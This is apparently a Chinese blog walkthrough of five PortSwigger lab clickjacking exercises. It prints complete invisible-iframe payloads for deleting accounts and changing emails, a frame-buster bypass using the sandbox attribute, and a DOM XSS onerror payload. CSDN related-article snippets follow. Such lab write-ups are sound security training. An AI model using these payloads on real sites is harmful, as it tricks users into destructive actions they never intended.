Burpsuite官方实验室之点击劫持

已于 2022-11-28 21:00:09 修改
阅读量2.5k 收藏 10
点赞数 3
分类专栏: 从入门到入狱 文章标签: 前端 javascript html web安全 web
于 2022-11-17 22:43:17 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_18980147/article/details/127913560
版权

Burpsuite实验室之点击劫持

这是BurpSuit官方的实验室靶场,以下将记录个人点击劫持共5个Lab的通关过程

lab1:

Basic clickjacking with CSRF token protection

带CSRF令牌保护的基本点击劫持

目标:官方给了一个账号密码wiener:peter,让我们登陆到后台,后台有删除功能。我们构造payload页面并显示click me一词让受害者进行点击。

在这里插入图片描述

后台的删除功能,我们要做的就是构造诱导用户点击这个删除按钮,该页面地址为(payload需要用到)

https://0ae9004604abaa52c04e12520045005c.web-security-academy.net/my-account

在这里插入图片描述

我们的payload利用了iframe标签,以下是body中的内容,其中的width、height、top、left需要自行调节对准即可,opacity透明度设为0.1方便调整,在真实情况设为0将它隐藏,用户不会知道自己点了什么

<style>
		   iframe {
		        position:relative;
		        width: 500px;
		        height: 700px;
		        opacity: 0.1;
		        z-index: 2;
		    }
		    div {
		        position:absolute;
		        top:500px;
		        left:60px;
		        z-index: 1;
		    }
</style>
		<div>Test me</div>
		<iframe src="https://0ae9004604abaa52c04e12520045005c.web-security-academy.net/my-account"></iframe>

在exploit server页面添加我们的payload看看效果

在这里插入图片描述

效果如下,点击Test me真就删了千万不要点

在这里插入图片描述

效果不错,我们最终更改payload的透明度并把Test me改为Click me

<style>
		   iframe {
		        position:relative;
		        width: 500px;
		        height: 700px;
		        opacity: 0;
		        z-index: 2;
		    }
		    div {
		        position:absolute;
		        top:500px;
		        left:60px;
		        z-index: 1;
		    }
</style>
		<div>Click me</div>
		<iframe src="https://0ae9004604abaa52c04e12520045005c.web-security-academy.net/my-account"></iframe>

这次啥也看不见了,受害者会好奇的点击我们的Click me,此时其实完成了删除用户的操作

在这里插入图片描述

验证结果,点击Deliver exploit to victim成功通关

在这里插入图片描述

lab2:

Clickjacking with form input data prefilled from a URL parameter

使用从URL参数预填充的表单输入数据单击劫持

这次目标变了,让我们更改用户的邮箱

在这里插入图片描述

定准位和lab1一样,找到update email接口的url更改iframe的src即可,最终payload如下

<style>
			iframe {
				position: relative;
				width: 500px;
				height: 700px;
				opacity: 0;
				z-index: 2;
			}

			div {
				position: absolute;
				top: 450px;
				left: 80px;
				z-index: 1;
			}
		</style>
		<div>Click me</div>
		<iframe
			src="https://0a5d00cc033dfde8c0712b5e00060032.web-security-academy.net/my-account?email=tpaer@hack.com"></iframe>

lab3:

Clickjacking with a frame buster script

用框架克星脚本点击劫持

这关表明看起来和lab2是一样的,也是邮箱

在这里插入图片描述

但是用和lab2一样的payload发现这个站点并不能被iframe框架化。因为可以框架化的站点都可能会遭受点击劫持攻击,开发时可能会做出一些防护设置如

检查并强制将当前应用程序窗口设置为主窗口或顶级窗口

让所有框架不透明化

阻止点击透明的框架

拦截并标记潜在的点击劫持攻击位置

这种技术防护是基于浏览器和平台的,有的浏览器会阻止运行破坏框架脚本或不支持运行JS脚本,攻击时有很多方法可以绕过。

在这里插入图片描述

通过iframe沙箱属性sanbox="allow-forms"进行绕过,最终payload如下

<style>
			iframe {
				position: relative;
				width: 500px;
				height: 700px;
				opacity: 0;
				z-index: 2;
			}

			div {
				position: absolute;
				top: 445px;
				left: 80px;
				z-index: 1;
			}
		</style>
		<div>Click me</div>
		<iframe
			src="https://0ab000ca03c23aa4c00f023f005d00cd.web-security-academy.net/my-account?email=tpaer@hack.com" sandbox="allow-forms"></iframe>

在这里插入图片描述

lab4:

Exploiting clickjacking vulnerability to trigger DOM-based XSS

利用点击劫持漏洞触发基于DOM的XSS

这关是DOM XSS与iframe结合进行攻击。

一个提交页面

在这里插入图片描述

寻找可用的DOM,源码发现引入了一个js文件

在这里插入图片描述

查看源码发现存在DOM XSS的部分
在这里插入图片描述

通过iframe成功帮助实现DOM XSS攻击

在这里插入图片描述

最终payload如下

<style>
			iframe {
				position:relative;
				width: 700px;
				height: 500px;
				opacity: 0;
				z-index: 2;
			}
			div {
				position:absolute;
				top:415px;
				left:80px;
				z-index: 1;
			}
		</style>
		<div>Click me</div>
		<iframe
		src="https://0a1e00db03d7474cc0aa2590001200a3.web-security-academy.net/feedback?name=<img src=1 onerror=print()>&email=tpa@hack.com&subject=test&message=test#feedbackResult"></iframe>

lab5:

Multistep clickjacking

多步点击劫持

这一关要诱导用户点击多个按钮

在这里插入图片描述

在点击完删除按钮后,会跳转页面需要进行确认

在这里插入图片描述

效果如下,第一个按钮

在这里插入图片描述

第二个按钮

在这里插入图片描述

最终payload

<style>
			iframe {
				position:relative;
				width: 500px;
				height: 700px;
				opacity: 0;
				z-index: 2;
			}
		   .firstClick, .secondClick {
				position:absolute;
				top:495px;
				left:40px;
				z-index: 1;
			}
		   .secondClick {
				top:290px;
				left:210px;
			}
		</style>
		<div class="firstClick">Click me first</div>
		<div class="secondClick">Click me next</div>
		<iframe src="https://0a4d002d03b4a808c055056300d200b8.web-security-academy.net/my-account"></iframe>
WEB安全渗透测试》(35) 使用Burp Clickbandit测试点击劫持
午夜安全
02-08 2312
点击劫持指的是,通过覆盖不可见的框架误导受害者点击,虽然受害者点击的是他所看到的网页,但其实他所点击的是被黑客精心构建的另一个置于原网页上面的透明页面。Burp Clickbandit 是用于生成点击劫持攻击的工具,当发现可能容易受到点击劫持的网页时,可以使用 Burp Clickbandit 发起攻击,并确认可以成功利用此漏洞。Burp Clickbandit 使用 JavaScript 在你的浏览器中运行,它适用于除 Microsoft IE 和 Edge 之外的所有现代浏览器。
点击劫持”测试「Clickjacking Test」-crx插件
03-09
通过Offcon Info Security进行的Clickjacking测试。 此chrome扩展程序将检查是否可以对当前网页进行格式化,甚至生成用于安全报告的概念证明HTML。 支持语言:English
burpsuite安全练兵场-客户端14】点击劫持-5个实验(全)
热门推荐
01-16 1万+
【BP靶场portswigger-客户端14-点击劫持】5个实验-万文详细步骤
Lab: Basic clickjacking with CSRF token protection:使用CSRF令牌保护的基本点击劫持
Zeker62的博客
08-23 292
靶场内容: 该实验室包含登录功能和受CSRF 令牌保护的删除帐户按钮。用户将点击诱饵网站上显示“点击”一词的元素。 为了解决这个实验,制作一些 HTML 来构建帐户页面并欺骗用户删除他们的帐户。删除帐号后,实验室就解决了。 您可以使用以下凭据登录自己的帐户: wiener:peter 注意 受害者将使用 Chrome,因此请在该浏览器上测试您的漏洞利用。 靶场解决方法 说实话,这就是一个隐...
BurpSuite官方说明书.doc
08-25
BurpSuite 官方说明书 BurpSuite 是一款功能强大且专业的 Web 应用安全测试工具,由 PortSwigger 公司开发。该工具主要用于检测 Web 应用程序中的漏洞和弱点,以便提高应用程序的安全性。本篇文章将对 BurpSuite 的...
burpsuite安装教程
04-08
burpsuite安装教程 首先,从官网下载您需要的Burp Suite版本。 安装Java Development Kit(JDK)。Burp Suite是用Java编写的,因此需要预先安装Java环境才能运行。如果您已经安装了JDK,则可以跳过此步骤。 解压缩...
关于burpsuite修改http包的http实验
03-27
你可以将这些代码上传到本地或远程服务器,然后通过BurpSuite进行篡改实验。 通过这些实验,不仅可以提升你对HTTP协议的理解,还能增强你在网络安全领域的实战技能,特别是对于Web应用渗透测试和安全防护方面。不过...
Burp Suite 的安装教程
04-18
burpsuite安装教程
操作介绍最详细的BurpSuite+实战指南
08-21
BurpSuite1.7版本,包括安装、各模块实战指南
点击劫持漏洞
weixin_52501704的博客
02-07 3429
点击劫持漏洞学习
(四)Clickjacking-点击劫持
weixin_43047908的博客
04-05 325
什么是点击劫持 Clickjacking是一种基于界面的攻击,其中,通过诱骗用户单击诱饵网站中的某些其他内容,诱骗用户单击隐藏网站上的可操作内容。 考虑以下示例: 网络用户访问诱饵网站(也许这是电子邮件提供的链接),然后单击按钮以赢取奖金。不知不觉中,它们已被攻击者欺骗,诱使他们按下了其他隐藏按钮,从而导致了另一个站点上的帐户付款。这是一个点击劫持攻击的示例。该技术取决于在iframe中包含按钮或隐藏链接的不可见,可操作的网页(或多个页面)的合并。iframe覆盖在用户预期的诱饵网页内容之上。 此攻击与CS
原来我一直被骗了!Burp suite诱导劫持攻击【附工具】
最新发布
jijisaq的博客
04-20 1149
一、点击劫持点击劫持是一种基于界面的攻击,用户通过点击诱饵网站中的一些其他内容被诱骗点击隐藏网站上的可操作内容。举例来说,一个网络用户可能会访问一个诱饵网站(可能是通过电子邮件提供的链接),并点击一个按钮以赢取奖品。然而,他们可能会在不知情的情况下点击了另一个隐藏按钮,导致了另一个网站上的帐户被用来支付款项。这就是点击劫持攻击的一个例子。
BurpSuite官方实验室之逻辑漏洞
tpaer的博客
11-28 2274
这是BurpSuit官方实验室靶场,以下将记录个人逻辑漏洞共11个Lab的通关过程。
使用BurpSuite实验室练习SQL注入攻击
Brisbane的博客
04-12 4519
因为之前对HTTP和Java都不熟悉,所以想要一开始就使用实验室师兄给的在线平台练习有点困难。好在我在一本参考书上看到推荐使用BurpSuite的在线实验室,又因为前段时间我恰好学习了Burp的网络扫描相关,于是我尝试着利用这个软件进一步的学习WEB的网络安全。后来发现上面的练习难度适中,并且既有原理说明,又有操作指导,强烈推荐像我这样的新手入门使用。 这周首先学习的是SQL注入攻击的第一部分。实...
Clickjacking (UI redressing)点击劫持
Eason_LYC安全白帽子的成长博客
05-13 2057
点击劫持(Clickjacking)全面梳理介绍,并有配套靶场练习。难得的学习材料。
点击劫持概念及解决办法
xswlw_guoquanbao的博客
09-14 1026
点击劫持 (Clickjacking) 技术又称为界面伪装攻击 (UI redress attack ),是一种视觉上的欺骗手段。攻击者使用一个或多个透明的 iframe 覆盖在一个正常的网页上,然后诱使用户在该网页上进行操作,当用户在不知情的情况下点击透明的 iframe 页面时,用户的操作已经被劫持到攻击者事先设计好的恶意按钮或链接上。攻击者既可以通过点击劫持设计一个独立的恶意网站,执行钓鱼攻击等;也可以与 XSS 和 CSRF 攻击相结合,突破传统的防御措施,提升漏洞的危害程度。
渗透测试成长篇-点击劫持漏洞
m0_51186260的博客
08-26 5335
1.前言 点击劫持就是一种视觉上的欺骗手段,攻击者使用一个透明的、不可见的iframe,覆盖在一个网页上,然后诱使用户在该网页上进行操作,此时用户在不知情的情况下点击了透明的iframe页面。通过调整iframe页面的位置,可以诱使用户恰好点击在iframe页面的一些功能性按钮上,攻击者常常配合社工手段完成攻击。(一般能被劫持就是网站缺少X-FRAME-OPTIONS) ************ 点击劫持一般在渗透测试中比较常见 2.过程 如何测试,有两种方法,今天就讲一种最简单常用的方式(bur.
burpsuite 实验室
09-08
Burp Suite实验室是一个网络安全学院提供的实验平台,用于提供关于Burp Suite工作原理的实践经验。它包含一系列易受攻击的实验,帮助用户学习和实践WEB的网络安全技术。平台提供了下载、安装Burp Suite的指导,以及拦截HTTP流量、修改请求、设置目标范围等操作的实验指导。其中,SQL注入攻击是实验室中的一部分,通过修改请求语句来实现攻击的目的。例如,可以使用'or 2=2--来进行查询,因为or语句始终成立,所以修改后的查询将返回所有项目。此外,通过注释语句--也可以对用户的登录操作信息进行攻击。通过Burp Suite实验室,用户可以逐步学习和掌握网络安全技术,并对常见的攻击方式有更深入的了解。<span class="em">1</span><span class="em">2</span><span class="em">3</span>
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值